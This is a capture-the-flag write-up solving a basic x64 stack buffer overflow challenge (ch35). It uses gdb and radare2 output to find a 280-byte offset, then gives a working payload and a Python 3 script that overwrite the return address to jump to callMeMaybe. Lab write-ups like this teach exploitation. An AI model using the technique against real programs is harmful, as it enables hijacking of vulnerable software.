Stack buffer overflow - basic
ELF x64 - Stack buffer overflow - basic
Listing the functions inside gdb
info functions
0x0000000000401152 callMeMaybe
0x0000000000401193 main
After ret
ret pops the value RSP points at into RIP, which redirects program execution flow
Challenge source code
Main idea:
http://repository.root-me.org/Exploitation%20-%20Syst%C3%A8me/Unix/EN%20-%2064%20Bits%20Linux%20Stack%20Based%20Buffer%20Overflow.pdf
Following this article: use the overflow to control RIP and point it at the function we want.
- First write characters into the buffer; when execution reaches ret, check the value of RSP to determine how many bytes it takes to overflow up to the slot RSP points at.
- The buffer starts at rbp-0x110, i.e. 272 bytes below the saved rbp; adding the 8 bytes of the saved rbp gives 280 bytes (0x118). Any bytes written after that land on the return address and end up in RIP.
- What we want executed is callMeMaybe(), so its address is appended at the end with its bytes reversed (little-endian).
Looking up the function address
[0x00401193]> fs symbols;f
0x00401000 23 sym._init
0x00401070 42 entry0
0x00401070 43 sym._start
0x004010a0 1 sym._dl_relocate_static_pie
0x004010b0 33 sym.deregister_tm_clones
0x004010e0 49 sym.register_tm_clones
0x00401120 33 entry.fini0
0x00401120 0 sym.__do_global_dtors_aux
0x00401150 2 entry.init0
0x00401150 0 sym.frame_dummy
0x00401152 65 sym.callMeMaybe
0x00401193 103 main
0x00401193 103 sym.main
Probe input: "a"*280+"B"*6
gdb-peda$ x/290xb $rbp-0x110
0x7fffffffdb80: 0x61 0x61 0x61 0x61 0x61 0x61 0x61 0x61
0x7fffffffdb88: 0x61 0x61 0x61 0x61 0x61 0x61 0x61 0x61
0x7fffffffdb90: 0x61 0x61 0x61 0x61 0x61 0x61 0x61 0x61
0x7fffffffdb98: 0x61 0x61 0x61 0x61 0x61 0x61 0x61 0x61
0x7fffffffdba0: 0x61 0x61 0x61 0x61 0x61 0x61 0x61 0x61
0x7fffffffdba8: 0x61 0x61 0x61 0x61 0x61 0x61 0x61 0x61
0x7fffffffdbb0: 0x61 0x61 0x61 0x61 0x61 0x61 0x61 0x61
0x7fffffffdbb8: 0x61 0x61 0x61 0x61 0x61 0x61 0x61 0x61
0x7fffffffdbc0: 0x61 0x61 0x61 0x61 0x61 0x61 0x61 0x61
0x7fffffffdbc8: 0x61 0x61 0x61 0x61 0x61 0x61 0x61 0x61
0x7fffffffdbd0: 0x61 0x61 0x61 0x61 0x61 0x61 0x61 0x61
0x7fffffffdbd8: 0x61 0x61 0x61 0x61 0x61 0x61 0x61 0x61
0x7fffffffdbe0: 0x61 0x61 0x61 0x61 0x61 0x61 0x61 0x61
0x7fffffffdbe8: 0x61 0x61 0x61 0x61 0x61 0x61 0x61 0x61
0x7fffffffdbf0: 0x61 0x61 0x61 0x61 0x61 0x61 0x61 0x61
0x7fffffffdbf8: 0x61 0x61 0x61 0x61 0x61 0x61 0x61 0x61
0x7fffffffdc00: 0x61 0x61 0x61 0x61 0x61 0x61 0x61 0x61
0x7fffffffdc08: 0x61 0x61 0x61 0x61 0x61 0x61 0x61 0x61
0x7fffffffdc10: 0x61 0x61 0x61 0x61 0x61 0x61 0x61 0x61
0x7fffffffdc18: 0x61 0x61 0x61 0x61 0x61 0x61 0x61 0x61
0x7fffffffdc20: 0x61 0x61 0x61 0x61 0x61 0x61 0x61 0x61
0x7fffffffdc28: 0x61 0x61 0x61 0x61 0x61 0x61 0x61 0x61
0x7fffffffdc30: 0x61 0x61 0x61 0x61 0x61 0x61 0x61 0x61
0x7fffffffdc38: 0x61 0x61 0x61 0x61 0x61 0x61 0x61 0x61
0x7fffffffdc40: 0x61 0x61 0x61 0x61 0x61 0x61 0x61 0x61
0x7fffffffdc48: 0x61 0x61 0x61 0x61 0x61 0x61 0x61 0x61
0x7fffffffdc50: 0x61 0x61 0x61 0x61 0x61 0x61 0x61 0x61
0x7fffffffdc58: 0x61 0x61 0x61 0x61 0x61 0x61 0x61 0x61
0x7fffffffdc60: 0x61 0x61 0x61 0x61 0x61 0x61 0x61 0x61
0x7fffffffdc68: 0x61 0x61 0x61 0x61 0x61 0x61 0x61 0x61
0x7fffffffdc70: 0x61 0x61 0x61 0x61 0x61 0x61 0x61 0x61
0x7fffffffdc78: 0x61 0x61 0x61 0x61 0x61 0x61 0x61 0x61
0x7fffffffdc80: 0x61 0x61 0x61 0x61 0x61 0x61 0x61 0x61
0x7fffffffdc88: 0x61 0x61 0x61 0x61 0x1e 0x01 0x00 0x00
0x7fffffffdc90: 0x61 0x61 0x61 0x61 0x61 0x61 0x61 0x61
0x7fffffffdc98: 0x42 0x42 0x42 0x42 0x42 0x42 0x00 0x00
0x7fffffffdca0: 0x88 0xdd
RIP is now under our control. The six B bytes land at 0x7fffffffdc98, the return-address slot (rbp+8), and ret tries to jump there. The four bytes 0x1e 0x01 0x00 0x00 at rbp-4 in the dump above are presumably a local variable written after the overflow (0x11e = 286, the length of the probe input), not part of what we control.
RSP: 0x7fffffffdc98 --> 0x424242424242 ('BBBBBB')
Invalid $PC address: 0x424242424242
Final payload: (python -c 'print "A" * 280 + "\xe7\x05\x40\x00\x00\x00\x00\x00"' ; cat ) | ./ch35
Note that the address in this payload (0x4005e7) is not the 0x401152 that info functions reported for the local build above; the address of callMeMaybe must be read from the copy of ch35 actually being exploited, because a differently compiled build places the function elsewhere. The print statement and the "\xNN" string escapes require Python 2. The trailing cat keeps stdin open after the payload has been sent, so that anything callMeMaybe starts can still read input.
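The same two steps (probe to find the offset, then pad and append the little-endian address) as a Python 3 script. This is an added example, not code from the challenge or the writeup; the stack layout constants come from the gdb session above, and the two target addresses are the ones the page lists (the local build's callMeMaybe and the address used in the final payload against ch35), which are assumed rather than re-derived here.

```python
import struct
import sys

# Stack layout as read off the gdb session on this page:
#   the buffer starts at rbp-0x110, so 0x110 (272) bytes sit below the saved rbp,
#   then 8 bytes of saved rbp, then the return address that `ret` pops into RIP.
BUF_RBP_OFFSET = 0x110
SAVED_RBP_SIZE = 8

# Assumed target addresses, copied from the two listings on the page: the local
# build's callMeMaybe (info functions) and the address used in the final payload.
CALLMEMAYBE_LOCAL = 0x401152
CALLMEMAYBE_CH35 = 0x4005e7


def offset_to_return_address(buf_rbp_offset=BUF_RBP_OFFSET):
    """Bytes that must be written before the next byte lands on the return address."""
    return buf_rbp_offset + SAVED_RBP_SIZE


def return_slot_address(buf_start, buf_rbp_offset=BUF_RBP_OFFSET):
    """Stack address of the return-address slot, given the buffer's start address.

    With the dump above starting at 0x7fffffffdb80 (= rbp-0x110) this gives
    0x7fffffffdc98, the RSP value gdb reports when `ret` faults.
    """
    rbp = buf_start + buf_rbp_offset
    return rbp + SAVED_RBP_SIZE


def probe_payload(padding, marker=b"B" * 6):
    """Step 1: padding plus a recognisable marker, to see what ends up in RSP/RIP."""
    return b"a" * padding + marker


def build_payload(target, offset=None, pad=b"A"):
    """Step 2: padding followed by the 64-bit target address in little-endian order.

    struct.pack("<Q", ...) performs the byte reversal the page does by hand,
    e.g. 0x4005e7 -> e7 05 40 00 00 00 00 00.
    """
    if offset is None:
        offset = offset_to_return_address()
    return pad * offset + struct.pack("<Q", target)


def newline_positions(payload):
    """Offsets of 0x0a bytes; a line-oriented read (gets/fgets) would stop there.

    NUL bytes are deliberately not flagged: the page's working payload contains
    them (the high bytes of a 0x0040xxxx address), so the read evidently
    does not stop on NUL.
    """
    return [i for i, b in enumerate(payload) if b == 0x0a]


if __name__ == "__main__":
    # Usage: (python3 exploit.py; cat) | ./ch35
    # The trailing cat keeps stdin open so whatever callMeMaybe starts can still read input.
    payload = build_payload(CALLMEMAYBE_CH35)
    if newline_positions(payload):
        sys.exit("payload contains a newline and would be cut short by a line-based read")
    sys.stdout.buffer.write(payload)
```

The newline check matters whenever the target address happens to contain 0x0a: such an address cannot be delivered through gets()/fgets() in one line, and the symptom is an RSP that holds only part of the intended value, much like the partial 0x424242424242 seen in the probe run.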